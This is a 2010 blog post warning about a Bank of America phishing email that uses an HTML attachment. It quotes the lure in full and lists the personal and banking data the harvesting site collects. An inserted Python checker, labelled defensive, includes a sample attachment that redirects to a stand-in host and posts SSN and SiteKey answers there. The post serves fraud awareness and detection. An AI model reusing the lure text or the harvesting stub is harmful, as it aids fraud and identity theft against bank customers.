Sunday 19 December 2010

Bank of America Alert: Secure Your Online Banking Informatiom

A pretty clever new Phishing fraud tactic is now being used to trick users into providing their Bank of America login information.

The email itself is fairly standard for a Phish, omitting both the user’s actual name and any reference to the real account number, instead relying on generic terms like “Dear Member.”

There are also some spelling inconsistencies, including in the Subject line itself, which reads “Informatiom” rather than “Information”.

The complete email:

Subject: Bank of America Alert: Secure Your Online Banking Informatiom
From: “Bank of America”

Dear Member,

As part of our efforts to provide a safe and secure environment for the
online community, we regularly screen account activity.
Our review of your account has identified an issue regarding its safe use.
We have placed a restriction on your account as a precaution.

To lift the restriction we will require some further information from you.

If, once we review your further information and we’re confident that the
use of your account does not present a safety risk to our service and
customers, we’ll be happy to reinstate your account.

We have sent you an attachment which contains all the necessary steps in order to restore your account access.
Download and open it in your browser.
After we have gathered the necessary information, you will regain full access to your account.

We thank you for your prompt attention to this matter.

Very sincerely,

Bank of America Review Department

Notice that while the email claims to be from “Bank of America” the headers reveal the message actually comes from hijacked foreign connections and mail servers.

What’s slightly different about this Phishing scam is that the email itself doesn’t contain the malicious hyperlink and the attachment isn’t an executable file, these being the two most common phishing tactics.

Instead, the email includes an HTML attachment to help avoid spam and security filtering, and it is that attachment that leads to the Phishing host site.
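As an added defensive example (not code from the original post), here is a small Python checker that parses a message and flags HTML attachments behaving as springboards to a harvesting site: an automatic meta refresh, script-driven navigation, or a form that posts to a remote host. The sample message, its filename and the phish.example.invalid host are constructed for the example.

```python
import email
import re
from email import policy

# Constructed sample message (not the real phish): the only payload is an
# HTML attachment that bounces the browser to an external harvesting site.
SAMPLE_EML = """\
From: "Bank of America" <alert@example.invalid>
Subject: Bank of America Alert: Secure Your Online Banking Informatiom
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XX"

--XX
Content-Type: text/plain

Dear Member, see the attached steps to restore your account access.
--XX
Content-Type: text/html; name="restore_access.html"
Content-Disposition: attachment; filename="restore_access.html"

<html><head><meta http-equiv="refresh" content="0;url=http://phish.example.invalid/boa/"></head>
<body><form action="http://phish.example.invalid/submit.php" method="post">
<input name="ssn"><input name="sitekey_answer"></form></body></html>
--XX--
"""

# Patterns that betray an HTML attachment acting as a springboard: an automatic
# redirect, a script-driven navigation, or a form that posts to another host.
REDIRECT_RE = re.compile(r'http-equiv\s*=\s*["\']?refresh', re.I)
SCRIPT_NAV_RE = re.compile(r'(?:window\.|document\.)?location(?:\.href)?\s*=', re.I)
FORM_ACTION_RE = re.compile(r'<form[^>]+action\s*=\s*["\']?(https?://[^"\'\s>]+)', re.I)


def html_attachment_findings(raw_eml: str) -> list:
    # Walk every MIME part; inline HTML bodies are normal, HTML *attachments* are the oddity.
    msg = email.message_from_string(raw_eml, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html" or part.get_content_disposition() != "attachment":
            continue
        name = part.get_filename() or "<unnamed>"
        body = part.get_content()
        if REDIRECT_RE.search(body):
            findings.append(f"{name}: meta refresh redirect")
        if SCRIPT_NAV_RE.search(body):
            findings.append(f"{name}: script-driven navigation")
        for url in FORM_ACTION_RE.findall(body):
            findings.append(f"{name}: form posts to {url}")
    return findings
```

A mail gateway rule built on the same idea would quarantine or strip HTML attachments that redirect or post credentials off-host, while leaving ordinary inline HTML newsletters alone.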

Once on the site, visitors are prompted to hand over just about every piece of account data to the con artists. Directions on the harvesting site include:

Provide answers to the following authentication questions to help us identify you and your account.

To complete verification, you will be taken through the following stages:

1. Input your Personal Information
2. Input your Account Information
3. Input your Online Banking Information
4. Click on Continue

The data that you’re asked to provide includes everything a criminal would need to steal your identity, your money and essentially ruin your life. They’re not just Phishing for your Bank of America account (though they’ll clean that out too) but also ask for:

* Date of Birth
* Social Security Number
* Mother’s Maiden Name
* Bank of America Login/Password
* Credit Card Numbers
* “SiteKey” Challenge Questions and responses

While this Phishing fraud may or may not have a high success rate, the depth and duration of the damage done to anyone who falls for the ruse will be absolutely devastating.

While the current campaign targets Bank of America, this will no doubt be adapted to target many other financial institutions in the future.
